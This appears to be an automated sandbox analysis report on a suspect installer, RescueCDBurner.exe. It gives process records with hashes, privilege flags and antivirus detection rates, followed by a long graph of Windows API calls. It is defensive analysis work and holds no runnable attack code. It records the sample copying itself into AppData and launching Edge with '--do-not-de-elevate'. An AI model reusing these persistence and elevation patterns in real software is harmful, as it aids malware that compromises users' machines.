                                                                                                                                                                MD5 hash:2C6652F7E01283DE091B5200B7878E69
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 29%, ReversingLabs
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:3
                                                                                                                                                                Start time:08:41:31
                                                                                                                                                                Start date:09/01/2025
                                                                                                                                                                Path:C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\TEMP\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe
                                                                                                                                                                Imagebase:0x5c0000
                                                                                                                                                                File size:6'487'736 bytes
                                                                                                                                                                MD5 hash:11C8962675B6D535C018A63BE0821E4C
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 3%, ReversingLabs
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:4
                                                                                                                                                                Start time:08:41:33
                                                                                                                                                                Start date:09/01/2025
                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe
                                                                                                                                                                Imagebase:0xe00000
                                                                                                                                                                File size:6'487'736 bytes
                                                                                                                                                                MD5 hash:11C8962675B6D535C018A63BE0821E4C
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 3%, ReversingLabs
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:5
                                                                                                                                                                Start time:08:41:34
                                                                                                                                                                Start date:09/01/2025
                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                Imagebase:0x410000
                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:6
                                                                                                                                                                Start time:08:41:34
                                                                                                                                                                Start date:09/01/2025
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:8
                                                                                                                                                                Start time:08:42:01
                                                                                                                                                                Start date:09/01/2025
                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe"
                                                                                                                                                                Imagebase:0xe00000
                                                                                                                                                                File size:6'487'736 bytes
                                                                                                                                                                MD5 hash:11C8962675B6D535C018A63BE0821E4C
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:9
                                                                                                                                                                Start time:08:42:01
                                                                                                                                                                Start date:09/01/2025
                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                Imagebase:0x410000
                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:10
                                                                                                                                                                Start time:08:42:02
                                                                                                                                                                Start date:09/01/2025
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                File size:2'364'728 bytes
                                                                                                                                                                MD5 hash:967F4470627F823F4D7981E511C9824F
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                                                                Reputation:moderate
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:11
                                                                                                                                                                Start time:08:42:02
                                                                                                                                                                Start date:09/01/2025
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:12
                                                                                                                                                                Start time:08:42:20
                                                                                                                                                                Start date:09/01/2025
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                File size:2'364'728 bytes
                                                                                                                                                                MD5 hash:967F4470627F823F4D7981E511C9824F
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:moderate
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:15
                                                                                                                                                                Start time:08:42:26
                                                                                                                                                                Start date:09/01/2025
                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"
                                                                                                                                                                Imagebase:0x7ff7fb980000
                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:16
                                                                                                                                                                Start time:08:42:27
                                                                                                                                                                Start date:09/01/2025
                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                Imagebase:0x7ff7fb980000
                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:false

                                                                                                                                                                General

                                                                                                                                                                Target ID:17
                                                                                                                                                                Start time:08:42:27
                                                                                                                                                                Start date:09/01/2025
                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=2180,i,768463352532878709,16600556330849448278,262144 /prefetch:3
                                                                                                                                                                Imagebase:0x7ff7fb980000
                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:18
                                                                                                                                                                Start time:08:42:28
                                                                                                                                                                Start date:09/01/2025
                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2904 --field-trial-handle=2620,i,15719151116728228039,7343282763489968008,262144 /prefetch:3
                                                                                                                                                                Imagebase:0x7ff7fb980000
                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:false

                                                                                                                                                                General

                                                                                                                                                                Target ID:24
                                                                                                                                                                Start time:08:42:33
                                                                                                                                                                Start date:09/01/2025
                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7096 --field-trial-handle=2620,i,15719151116728228039,7343282763489968008,262144 /prefetch:8
                                                                                                                                                                Imagebase:0x7ff7fb980000
                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:25
                                                                                                                                                                Start time:08:42:33
                                                                                                                                                                Start date:09/01/2025
                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=5304 --field-trial-handle=2620,i,15719151116728228039,7343282763489968008,262144 /prefetch:8
                                                                                                                                                                Imagebase:0x7ff7fb980000
                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:28
                                                                                                                                                                Start time:08:43:28
                                                                                                                                                                Start date:09/01/2025
                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7120 --field-trial-handle=2620,i,15719151116728228039,7343282763489968008,262144 /prefetch:8
                                                                                                                                                                Imagebase:0x7ff7fb980000
                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:false

                                                                                                                                                                Disassembly

                                                                                                                                                                Reset < >

                                                                                                                                                                  Execution Graph

                                                                                                                                                                  Execution Coverage:4.8%
                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                  Signature Coverage:8.5%
                                                                                                                                                                  Total number of Nodes:1932
                                                                                                                                                                  Total number of Limit Nodes:55
                                                                                                                                                                  execution_graph 50655 93ce90 30 API calls 50656 940090 95 API calls 50657 93fa97 54 API calls 50660 960e90 46 API calls 2 library calls 50661 916c99 77 API calls 50663 919280 52 API calls 50664 919880 67 API calls 48498 93de80 CompareStringA 48499 93debf GetCurrentProcess GetCurrentProcess DuplicateHandle 48498->48499 48500 93df6c CreateFileA 48498->48500 48501 93dee0 GetLastError 48499->48501 48502 93df2f 48499->48502 48503 93df8c GetLastError 48500->48503 48506 93deec 48500->48506 48501->48506 48507 93dcd9 6 API calls 48502->48507 48505 93df98 48503->48505 48505->48506 48507->48506 50666 929489 60 API calls 50667 932de9 263 API calls 50668 931d00 321 API calls 50667->50668 50669 96b0b7 InitializeCriticalSection 50670 9194b0 GetProcessHeap RtlFreeHeap GetLastError GetProcessHeap HeapSize 50671 9196b0 15 API calls 50676 9172bf 382 API calls 50677 9190a0 57 API calls _ValidateLocalCookies 50213 93e0a0 50214 93e0cd 50213->50214 50215 93e14a SetFilePointerEx 50214->50215 50217 93e0d7 50214->50217 50216 93e162 GetLastError 50215->50216 50215->50217 50216->50217 50679 9532af 121 API calls 50683 9292d2 58 API calls 48315 97c2d6 48316 97c1e1 48315->48316 48318 97c6ef 48316->48318 48344 97c44d 48318->48344 48321 97c780 48325 97c7f8 LoadLibraryExA 48321->48325 48327 97c859 48321->48327 48331 97c86b 48321->48331 48333 97c927 48321->48333 48322 97c75c 48323 97c68d DloadReleaseSectionWriteAccess 8 API calls 48322->48323 48324 97c767 RaiseException 48323->48324 48340 97c955 48324->48340 48326 97c80b GetLastError 48325->48326 48325->48327 48328 97c834 48326->48328 48335 97c81e 48326->48335 48330 97c864 FreeLibrary 48327->48330 48327->48331 48332 97c68d DloadReleaseSectionWriteAccess 8 API calls 48328->48332 48329 97c8c9 GetProcAddress 48329->48333 48334 97c8d9 GetLastError 48329->48334 48330->48331 48331->48329 48331->48333 48336 97c83f RaiseException 48332->48336 48350 97c68d 48333->48350 48337 97c8ec 48334->48337 48335->48327 48335->48328 48336->48340 48337->48333 48339 97c68d DloadReleaseSectionWriteAccess 8 API calls 48337->48339 48341 97c90d RaiseException 48339->48341 48340->48316 48342 97c44d ___delayLoadHelper2@8 7 API calls 48341->48342 48343 97c924 48342->48343 48343->48333 48345 97c47a 48344->48345 48346 97c459 48344->48346 48345->48321 48345->48322 48358 97c4f6 48346->48358 48348 97c45e 48348->48345 48363 97c61f 48348->48363 48351 97c6c1 48350->48351 48352 97c69f 48350->48352 48351->48340 48353 97c4f6 DloadReleaseSectionWriteAccess 4 API calls 48352->48353 48354 97c6a4 48353->48354 48355 97c6bc 48354->48355 48356 97c61f DloadProtectSection 3 API calls 48354->48356 48370 97c6c3 GetModuleHandleW GetProcAddress GetProcAddress RtlReleaseSRWLockExclusive DloadReleaseSectionWriteAccess 48355->48370 48356->48355 48368 97c480 GetModuleHandleW GetProcAddress GetProcAddress 48358->48368 48360 97c4fb 48361 97c517 48360->48361 48362 97c513 RtlAcquireSRWLockExclusive 48360->48362 48361->48348 48362->48348 48366 97c634 DloadProtectSection 48363->48366 48364 97c63a 48364->48345 48365 97c66f VirtualProtect 48365->48364 48366->48364 48366->48365 48369 97c535 VirtualQuery GetSystemInfo 48366->48369 48368->48360 48369->48365 48370->48351 50685 91d6d3 103 API calls 50686 93fad1 54 API calls 50687 94fad0 84 API calls 50688 95ecd0 7 API calls ___scrt_uninitialize_crt 48380 9568d2 48381 9568de ___scrt_is_nonwritable_in_current_image 48380->48381 48405 956cb0 48381->48405 48383 9568e5 48384 956a38 48383->48384 48394 95690f ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 48383->48394 48424 956faf 4 API calls 2 library calls 48384->48424 48386 956a3f 48417 95e779 48386->48417 48390 956a4d 48391 95692e 48392 9569af 48413 9570ca 48392->48413 48394->48391 48394->48392 48420 95e753 41 API calls 4 library calls 48394->48420 48396 9569b5 48397 9569ca 48396->48397 48421 957100 GetModuleHandleW 48397->48421 48399 9569d1 48399->48386 48400 9569d5 48399->48400 48401 9569de 48400->48401 48422 95e72e 21 API calls CallUnexpected 48400->48422 48423 956e21 77 API calls ___scrt_uninitialize_crt 48401->48423 48404 9569e6 48404->48391 48406 956cb9 48405->48406 48426 957255 IsProcessorFeaturePresent 48406->48426 48408 956cc5 48427 9594ae 10 API calls 2 library calls 48408->48427 48410 956cca 48411 956cce 48410->48411 48428 9594cd 7 API calls 2 library calls 48410->48428 48411->48383 48429 957460 48413->48429 48416 9570f0 48416->48396 48431 95e5ad 48417->48431 48420->48392 48421->48399 48422->48401 48423->48404 48424->48386 48425 95e73d 21 API calls CallUnexpected 48425->48390 48426->48408 48427->48410 48428->48411 48430 9570dd GetStartupInfoW 48429->48430 48430->48416 48432 95e5ec 48431->48432 48433 95e5da 48431->48433 48443 95e45d 48432->48443 48458 957100 GetModuleHandleW 48433->48458 48436 95e5df 48436->48432 48459 95e68e GetModuleHandleExW 48436->48459 48438 956a45 48438->48425 48442 95e63e 48444 95e469 ___scrt_is_nonwritable_in_current_image 48443->48444 48465 9620b1 EnterCriticalSection 48444->48465 48446 95e473 48466 95e4c5 48446->48466 48448 95e480 48470 95e49e 48448->48470 48451 95e644 48475 95e675 48451->48475 48453 95e64e 48454 95e662 48453->48454 48455 95e652 GetCurrentProcess TerminateProcess 48453->48455 48456 95e68e CallUnexpected 3 API calls 48454->48456 48455->48454 48457 95e66a ExitProcess 48456->48457 48458->48436 48460 95e6cd GetProcAddress 48459->48460 48461 95e6ee 48459->48461 48460->48461 48462 95e6e1 48460->48462 48463 95e6f4 FreeLibrary 48461->48463 48464 95e5eb 48461->48464 48462->48461 48463->48464 48464->48432 48465->48446 48467 95e4d1 ___scrt_is_nonwritable_in_current_image CallUnexpected 48466->48467 48469 95e535 CallUnexpected 48467->48469 48473 95ebbd 14 API calls 2 library calls 48467->48473 48469->48448 48474 962101 LeaveCriticalSection 48470->48474 48472 95e48c 48472->48438 48472->48451 48473->48469 48474->48472 48478 96213d 5 API calls CallUnexpected 48475->48478 48477 95e67a CallUnexpected 48477->48453 48478->48477 50689 96c0da GetProcessHeap RtlAllocateHeap 50690 9610d8 42 API calls 4 library calls 50692 96c8c3 70 API calls 50693 9568c0 42 API calls 49321 917cc6 49322 917ccb 49321->49322 49331 914456 SetLastError GetModuleFileNameW 49322->49331 49324 917cfd 49325 918119 72 API calls 49324->49325 49326 917d31 49325->49326 49327 917d48 49326->49327 49404 91367f GetProcessHeap RtlFreeHeap GetLastError 49326->49404 49349 933fe2 49327->49349 49332 914484 GetLastError 49331->49332 49333 9144be 49331->49333 49340 914490 49332->49340 49334 914559 49333->49334 49335 9144c9 GetLastError 49333->49335 49336 9129c8 52 API calls 49334->49336 49335->49334 49337 9144d8 49335->49337 49338 9144e3 49336->49338 49339 9137f3 2 API calls 49337->49339 49338->49340 49341 914508 SetLastError 49338->49341 49342 914502 49338->49342 49339->49338 49340->49324 49343 91450f GetModuleFileNameW 49341->49343 49342->49341 49344 914525 GetLastError 49343->49344 49345 9145b4 GetLastError 49343->49345 49344->49340 49347 914534 49344->49347 49348 914554 49345->49348 49346 9129c8 52 API calls 49346->49347 49347->49343 49347->49346 49347->49348 49348->49340 49350 934005 _memcpy_s 49349->49350 49405 91aa6f InitializeCriticalSection 49350->49405 49357 934455 49434 91eaf6 49357->49434 49361 93445e 49363 93446c 49361->49363 49457 91367f GetProcessHeap RtlFreeHeap GetLastError 49361->49457 49366 93447a 49363->49366 49458 91367f GetProcessHeap RtlFreeHeap GetLastError 49363->49458 49368 917d5b 49366->49368 49369 9155c9 3 API calls 49366->49369 49369->49368 49370 9340b9 49379 934020 49370->49379 49441 932372 59 API calls 49370->49441 49372 934112 49373 918119 72 API calls 49372->49373 49372->49379 49374 934145 49373->49374 49375 934152 49374->49375 49376 93418c 49374->49376 49442 96acf6 72 API calls _ValidateLocalCookies 49375->49442 49443 934491 60 API calls 49376->49443 49379->49357 49456 91367f GetProcessHeap RtlFreeHeap GetLastError 49379->49456 49380 934192 49380->49379 49444 91b861 80 API calls 49380->49444 49382 9341c5 49382->49379 49445 91b861 80 API calls 49382->49445 49384 934207 49384->49379 49391 934246 49384->49391 49446 91b89c 49384->49446 49386 91b89c 80 API calls 49389 934282 49386->49389 49387 91b89c 80 API calls 49388 934314 49387->49388 49388->49379 49392 934361 49388->49392 49453 92f752 110 API calls 49388->49453 49389->49379 49449 914601 49389->49449 49391->49379 49391->49386 49398 9342dd 49391->49398 49392->49379 49454 922b07 95 API calls 49392->49454 49394 9342ae 49394->49379 49396 91b89c 80 API calls 49394->49396 49396->49398 49397 9343a5 49397->49379 49455 91f4db 89 API calls 49397->49455 49398->49379 49398->49387 49398->49388 49400 9343d1 49400->49379 49401 913db5 52 API calls 49400->49401 49402 9343fb 49401->49402 49402->49379 49403 912eaf 52 API calls 49402->49403 49403->49379 49404->49327 49406 91b448 49405->49406 49408 91b483 49406->49408 49410 91b4a3 49406->49410 49459 91813a 49406->49459 49408->49410 49464 918218 54 API calls 49408->49464 49411 9567e6 _ValidateLocalCookies 5 API calls 49410->49411 49412 91b4ee 49411->49412 49412->49379 49413 91ed7b 49412->49413 49414 91ed9b _memcpy_s 49413->49414 49415 91edca 49414->49415 49416 914456 60 API calls 49414->49416 49419 91ee48 49415->49419 49493 91367f GetProcessHeap RtlFreeHeap GetLastError 49415->49493 49417 91ede8 49416->49417 49417->49415 49481 91ebdb 49417->49481 49419->49379 49421 91ebba 49419->49421 49422 91ebca 49421->49422 49424 91ebd3 49421->49424 49521 93ee35 8 API calls 49422->49521 49424->49379 49425 91ee6f 49424->49425 49426 91ee8b 49425->49426 49427 91ee7f 49425->49427 49522 93f028 8 API calls 49426->49522 49427->49379 49429 953ce0 49427->49429 49523 97061b VariantInit 49429->49523 49433 953cfe 49433->49370 49435 91eb33 49434->49435 49436 91eb08 49434->49436 49438 91eb43 _memcpy_s 49435->49438 49439 91eb38 CloseHandle 49435->49439 49541 93ed3e 10 API calls 49436->49541 49438->49361 49439->49438 49440 91eb0e 49440->49435 49441->49372 49442->49379 49443->49380 49444->49382 49445->49384 49542 91a0d7 EnterCriticalSection 49446->49542 49450 914614 49449->49450 49452 914653 49449->49452 49451 912eaf 52 API calls 49450->49451 49450->49452 49451->49452 49452->49394 49453->49392 49454->49397 49455->49400 49456->49357 49457->49363 49458->49366 49465 918306 49459->49465 49461 918154 49463 91815a 49461->49463 49470 919f0a 49461->49470 49463->49406 49464->49408 49466 918320 CompareStringW 49465->49466 49469 91837d 49465->49469 49467 91834d 49466->49467 49467->49466 49468 918371 GetLastError 49467->49468 49467->49469 49468->49469 49469->49461 49471 919f26 49470->49471 49478 919fa3 _memcpy_s 49470->49478 49473 91a092 49471->49473 49475 919f67 49471->49475 49477 919f35 49471->49477 49472 912eaf 52 API calls 49472->49477 49480 91540b GetProcessHeap RtlAllocateHeap 49473->49480 49475->49477 49479 9156c2 GetProcessHeap RtlReAllocateHeap 49475->49479 49477->49463 49478->49472 49478->49477 49479->49478 49480->49478 49482 91ec80 GetCurrentProcess GetCurrentProcess DuplicateHandle 49481->49482 49483 91ec0d CreateFileW 49481->49483 49484 91eca0 GetLastError 49482->49484 49485 91ecda SetFilePointerEx 49482->49485 49483->49485 49486 91ec31 GetLastError 49483->49486 49491 91ec69 49484->49491 49488 91ecfb GetLastError 49485->49488 49489 91ed3c 49485->49489 49490 91ec3d 49486->49490 49488->49491 49489->49491 49494 93ee8b 49489->49494 49490->49491 49491->49415 49493->49419 49495 912eaf 52 API calls 49494->49495 49496 93eea7 49495->49496 49497 93eec4 CreateEventW 49496->49497 49505 93eead 49496->49505 49498 93eed6 GetLastError 49497->49498 49499 93ef1a CreateEventW 49497->49499 49498->49505 49500 93ef63 CreateThread 49499->49500 49501 93ef2c GetLastError 49499->49501 49502 93efb4 49500->49502 49503 93ef7a GetLastError 49500->49503 49507 93e800 CoInitializeEx 49500->49507 49501->49505 49506 93ec24 6 API calls 49502->49506 49503->49505 49505->49491 49506->49505 49508 93e831 49507->49508 49519 93e855 49507->49519 49509 9567e6 _ValidateLocalCookies 5 API calls 49508->49509 49510 93eae2 49509->49510 49511 93e9ca SetEvent 49512 93ea20 49511->49512 49513 93e9d7 GetLastError 49511->49513 49515 91174a 2 API calls 49512->49515 49520 93e8a5 49513->49520 49514 93eacd CoUninitialize 49514->49508 49516 93ea2a 49515->49516 49517 93ea49 ResetEvent 49516->49517 49516->49520 49518 93ea56 GetLastError 49517->49518 49517->49520 49518->49520 49519->49511 49519->49520 49520->49514 49521->49424 49522->49427 49529 96fe01 GetModuleHandleA 49523->49529 49525 9567e6 _ValidateLocalCookies 5 API calls 49526 953cf8 49525->49526 49526->49433 49528 95396f 201 API calls 49526->49528 49527 970662 49527->49525 49528->49433 49530 96fea6 GetProcAddress 49529->49530 49531 96fe2b GetLastError 49529->49531 49532 96ff16 CoCreateInstance 49530->49532 49533 96feb6 GetProcAddress GetProcAddress GetProcAddress 49530->49533 49537 96fe37 49531->49537 49535 96ff58 49532->49535 49538 96ff37 49532->49538 49534 96fee8 49533->49534 49534->49532 49535->49538 49540 97003b SysAllocString SysFreeString 49535->49540 49537->49527 49538->49537 49539 970032 ExitProcess 49538->49539 49540->49538 49541->49440 49543 918306 2 API calls 49542->49543 49544 91a0fa 49543->49544 49545 919f0a 52 API calls 49544->49545 49551 91a100 49544->49551 49556 91a127 49544->49556 49545->49556 49546 91a270 49567 93dbcf 52 API calls 49546->49567 49547 91a2ac LeaveCriticalSection 49549 91a2b7 49547->49549 49550 91a2cb 49547->49550 49549->49550 49555 91a2d7 73 API calls 49549->49555 49550->49391 49551->49547 49552 91a1c5 49554 91a2d7 73 API calls 49552->49554 49559 91a1fe 49552->49559 49553 91a21a 49553->49552 49557 91a203 49553->49557 49554->49559 49555->49550 49556->49546 49556->49551 49556->49552 49556->49553 49556->49557 49558 91a1e4 49556->49558 49564 91a2d7 49557->49564 49558->49552 49558->49559 49561 91a1ef 49558->49561 49559->49546 49562 918119 72 API calls 49559->49562 49563 91a2d7 73 API calls 49561->49563 49562->49546 49563->49559 49568 96b3c8 49564->49568 49567->49551 49569 96b3d3 49568->49569 49570 91a2e9 49569->49570 49572 96a9ff 49569->49572 49570->49559 49583 912ec6 49572->49583 49574 96aa1c 49575 96aa22 49574->49575 49576 912ae3 56 API calls 49574->49576 49581 96aaaa 49575->49581 49598 91367f GetProcessHeap RtlFreeHeap GetLastError 49575->49598 49577 96aa4f 49576->49577 49577->49575 49578 96a805 69 API calls 49577->49578 49578->49575 49580 96aab7 49580->49570 49581->49580 49599 91367f GetProcessHeap RtlFreeHeap GetLastError 49581->49599 49584 912ee9 49583->49584 49585 912ede 49583->49585 49587 912f14 MultiByteToWideChar 49584->49587 49588 912f77 49584->49588 49590 912eef 49584->49590 49586 9137f3 2 API calls 49585->49586 49586->49584 49587->49588 49589 912f2b GetLastError 49587->49589 49588->49590 49591 912fc4 49588->49591 49592 912fcd 49588->49592 49597 912fcb 49588->49597 49589->49590 49590->49574 49600 9156c2 GetProcessHeap RtlReAllocateHeap 49591->49600 49601 91540b GetProcessHeap RtlAllocateHeap 49592->49601 49593 913018 MultiByteToWideChar 49593->49590 49596 913031 GetLastError 49593->49596 49596->49590 49597->49590 49597->49593 49598->49581 49599->49580 49600->49597 49601->49597 50694 9672cf 20 API calls __vsnwprintf_l 50695 9290c9 130 API calls _ValidateLocalCookies 50698 9194f0 76 API calls 2 library calls 50702 960ef0 15 API calls 50703 919ae0 60 API calls _ValidateLocalCookies 50704 939ce0 179 API calls 50705 940ee0 81 API calls 50707 960ce0 16 API calls _memcpy_s 50225 9174ee 50259 92a5be 50225->50259 50228 914456 60 API calls 50230 917575 50228->50230 50229 9176b8 IsWindow 50231 9176c5 PostMessageW 50229->50231 50232 9176d4 50229->50232 